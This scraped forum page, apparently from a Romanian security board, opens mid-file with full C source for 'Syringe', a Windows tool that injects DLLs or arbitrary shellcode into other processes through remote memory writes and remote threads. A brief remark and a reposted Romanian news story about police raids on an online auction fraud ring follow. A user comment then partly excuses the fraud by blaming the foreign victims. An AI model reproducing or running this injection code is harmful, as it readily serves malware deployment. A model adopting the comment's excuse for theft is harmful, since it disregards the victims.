ATTACK_TYPE_SHELL_CODE_INJECTION 2 #define ATTACK_TYPE_EXECUTE_SHELL_CODE 3 int InjectDLL(char *dll, int ProcessID); int InjectShellcode(char *data, int ProcessID); int ExecuteShellcode(char *data); DWORD WINAPI RemoteExecPayloadStub(LPVOID lpParameter); DWORD WINAPI LocalExecPayloadStub(LPVOID lpParameter); int main(int argc, char* argv[]) { char dllPath[MAXLINE] = ""; unsigned int pid = 0; unsigned int injResult; unsigned char attackType = 0; unsigned char numargs = 4; char *usageString = "Syringe v1.2\nA General Purpose DLL & Code Injection Utility\n\nUsage:\n\nInject DLL:\n\tsyringe.exe -1 [ dll ] [ pid ]\n\nInject Shellcode:\n\tsyringe.exe -2 [ shellcode ] [ pid ]\n\nExecute Shellcode:\n\tsyringe.exe -3 [ shellcode ]\n"; if (argc < 2) { printf("%s", usageString); return 0; } if (strncmp(argv[1], "-1", 2) == 0) { attackType = ATTACK_TYPE_DLL_INJECTION; } else if (strncmp(argv[1], "-2", 2) == 0) { attackType = ATTACK_TYPE_SHELL_CODE_INJECTION; } else if (strncmp(argv[1], "-3", 2) == 0) { attackType = ATTACK_TYPE_EXECUTE_SHELL_CODE; numargs = 3; } else { printf("%s", usageString); return 0; } if (argc != numargs) { printf("%s", usageString); return 0; } if ((attackType == ATTACK_TYPE_DLL_INJECTION) || (attackType == ATTACK_TYPE_SHELL_CODE_INJECTION)) { pid = atoi(argv[3]); if (!pid) { printf("Invalid Process ID.\n"); return 0; } if (attackType == ATTACK_TYPE_DLL_INJECTION) { GetFullPathNameA(argv[2], MAXLINE, dllPath, NULL); injResult = InjectDLL(dllPath, pid); } else if (attackType == ATTACK_TYPE_SHELL_CODE_INJECTION) { injResult = InjectShellcode(argv[2], pid); } if (injResult == 0) { printf("Successfully Injected.\n"); } else { printf("Failed To Inject. \nError: "); switch (injResult) { case 1: { printf("Invalid Process ID.\n"); break; } case 2: { printf("Could Not Open A Handle To The Process.\n"); break; } case 3: { printf("Could Not Get The Address Of LoadLibraryA.\n"); break; } case 4: { printf("Could Not Allocate Memory In Remote Process.\n"); break; } case 5: { printf("Could Not Write To Remote Process.\n"); break; } case 6: { printf("Could Not Start The Remote Thread.\n"); break; } } } } else if (attackType == ATTACK_TYPE_EXECUTE_SHELL_CODE) { ExecuteShellcode(argv[2]); } return 0; } int InjectDLL(char *dll, int ProcessID) { HANDLE Proc, RemoteThread; LPVOID RemoteStringPtr, LoadLibAddr; int writeProcError; if(!ProcessID) { return 1; } Proc = OpenProcess(CREATE_THREAD_ACCESS, FALSE, ProcessID); if(!Proc) { return 2; } LoadLibAddr = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); if (LoadLibAddr == NULL) { return 3; } RemoteStringPtr = (LPVOID)VirtualAllocEx(Proc, NULL, strlen(dll), MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE); if (RemoteStringPtr == NULL) { return 4; } writeProcError = WriteProcessMemory(Proc, (LPVOID)RemoteStringPtr, dll, strlen(dll), NULL); if (writeProcError == 0) { return 5; } RemoteThread = CreateRemoteThread(Proc, NULL, NULL, (LPTHREAD_START_ROUTINE)LoadLibAddr, (LPVOID)RemoteStringPtr, NULL, NULL); if (RemoteThread == NULL) { return 6; } CloseHandle(Proc); return 0; } int InjectShellcode(char *data, int ProcessID) { HANDLE Proc, RemoteThread; void *RemoteStringPtr; void *RemoteStubPtr; int writeProcError; unsigned long oldprot; // Step 1, get a handle to a process if(!ProcessID) { return 1; } Proc = OpenProcess(CREATE_THREAD_ACCESS, FALSE, ProcessID); if(!Proc) { return 2; } // Step 2, write the shellcode to the remote process RemoteStringPtr = VirtualAllocEx(Proc, NULL, (strlen(data) + 1), MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (RemoteStringPtr == NULL) { return 4; } writeProcError = WriteProcessMemory(Proc, RemoteStringPtr, data, strlen(data), NULL); if (writeProcError == 0) { return 5; } // Step 3, write the assembly stub that will call the shellcode in the remote process RemoteStubPtr = VirtualAllocEx(Proc, NULL, REMOTE_ASSEMBLY_STUB_LENGTH_RELEASE, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (RemoteStubPtr == NULL) { return 4; } VirtualProtect(RemoteExecPayloadStub, REMOTE_ASSEMBLY_STUB_LENGTH_RELEASE, PAGE_EXECUTE_READWRITE, &oldprot); writeProcError = WriteProcessMemory(Proc, RemoteStubPtr, RemoteExecPayloadStub, REMOTE_ASSEMBLY_STUB_LENGTH_RELEASE, NULL); if (writeProcError == 0) { return 5; } // Step 4, start the assembly stub in via a call to CreateRemoteThread() RemoteThread = CreateRemoteThread(Proc, NULL, NULL, (LPTHREAD_START_ROUTINE)RemoteStubPtr, (LPVOID)RemoteStringPtr, NULL, NULL); if (RemoteThread == NULL) { return 6; } CloseHandle(Proc); // Step 5, Profit. return 0; } int ExecuteShellcode(char *data) { HANDLE LocalThread; int tid; void *StringPtr; StringPtr = VirtualAlloc(NULL, (strlen(data) + 1), MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE); strncpy(StringPtr, data, strlen(data)); LocalThread = CreateThread(NULL, 0, LocalExecPayloadStub, StringPtr, 0, &tid); printf("Waiting For Shellcode To Return... "); WaitForSingleObject(LocalThread, INFINITE); printf("Done.\n"); return 0; } DWORD WINAPI RemoteExecPayloadStub(LPVOID lpParameter) { __asm { mov eax, [lpParameter] call eax // Exit function is thread, don't mess this up push 0 call ExitThread } return 0; } DWORD WINAPI LocalExecPayloadStub(LPVOID lpParameter) { __try { __asm { mov eax, [lpParameter] call eax push 0 call ExitThread } } __except(EXCEPTION_EXECUTE_HANDLER) { } return 0; } Download: http://www.securestate.com/Documents/syringe.c

Foarte interesant... pentru forumurile de Counter-Strike. Nu pentru RST.

DIICOT, calare pe hackerii romani. Pechezitii in Sibiu, Cluj, Arad, Valcea si Bucuresti Written by securityportal.ro Tuesday, 22 November 2011 15:10 Mai multe perchezitii au loc, marti dimineata, in judetele Sibiu, Cluj, Arad, Valcea, precum si in Capitala, pentru destructurarea unei grupari specializate in fraude informatice, care a produs un prejudiciu estimat la 120.000 de euro. Potrivit procurorului-sef al DIICOT Sibiu, Danusia Boician, au loc perchezitii in judetele Sibiu, Cluj, Arad, Valcea, precum si in Capitala, fiind vizata o retea din care fac parte aproximativ 25 de persoane specializate in inselaciuni informatice, care isi racolau victimele dintre persoanele ce fac cumparaturi online. Scopul actiunii noastre a fost destramarea unui grup organizat constituit pentru savarsirea de fraude informatice. Modul de operare este deja clasic: licitatii fictive pe diferite site-uri de internet. Infractorii postau tot felul de bunuri la vanzare, bunuri pe care nu le detineau", a declarat Cristian Negru, cita de Mediafax. Conform sursei citate, suspectii, care au creat un prejudiciu estimat la 120.000 de euro, vor fi dusi pentru audieri la sediul DICOT Sibiu. Procurorii DIICOT Sibiu au stabilit ca 130 de cetateni straini au fost inselati de gruparea specializata in fraude informatice in cazul careia s-au facut perchezitii. Pana in prezent a fost stabilit un prejudiciu de 120.000 de euro, fiind vorba despre 130 de parti vatamate, toate din strainatate. Cristian Negru a precizat ca suspectii vindeau fictiv tot felul de produse, de la echipamente IT si telefoane mobile de ultima generatie pana la utilaje agricole si autoturisme. Infractorii trimiteau partilor vatamate doar imaginea unui produs si cereau fie un avans, fie toata suma inainte. In dosar sunt 24 de invinuiti, printre care si femei, audierile fiind in desfasurare, la ora transmiterii acestei stiri, la sediul DIICOT Sibiu. Potrivit sefului Serviciului de Combatere a Criminalitatii Informatice Alba Iulia, gruparea s-a constituit in 2011, prin fuzionarea a doua grupari mai vechi. "Liderii celor doua grupari au stabilit ca este mult mai rentabil sa lucreze impreuna, sa-si imprumute unii altora conturile bancare si sagetile controlate de ei. Au infiintat o societate comerciala si un site care avea ca obiect vanzarea de produse de curatenie si ofereau fictiv servicii de curatenie", a precizat Cristian Negru. Toti cei invinuiti au antecedente de fraude informatice, iar daca vor fi gasiti vinovati, risca o pedeapsa cu inchisoarea cuprinsa intre 10 si 20 de ani. Sursa: http://securityportal.ro/stiri/stiri-interne/819-diicot-calare-pe-hackerii-romani-pechezitii-in-sibiu-cluj-arad-valcea-si-bucuresti.html Parerile mele: 1. Felicitari DIICOT, sper sa scapam de toti "hackerii" acestia 2. Trist "securityportal" sa numeasca "hackeri" astfel de specimene, astfel de HOTI 3. Pe de-o parte le dau dreptate acestor "personaje", adica nu le fura portofelele, daca strainii sunt atat de ratati, merita sa pateasca asa ceva 4. Banii adusi in tara contribuie la economia tarii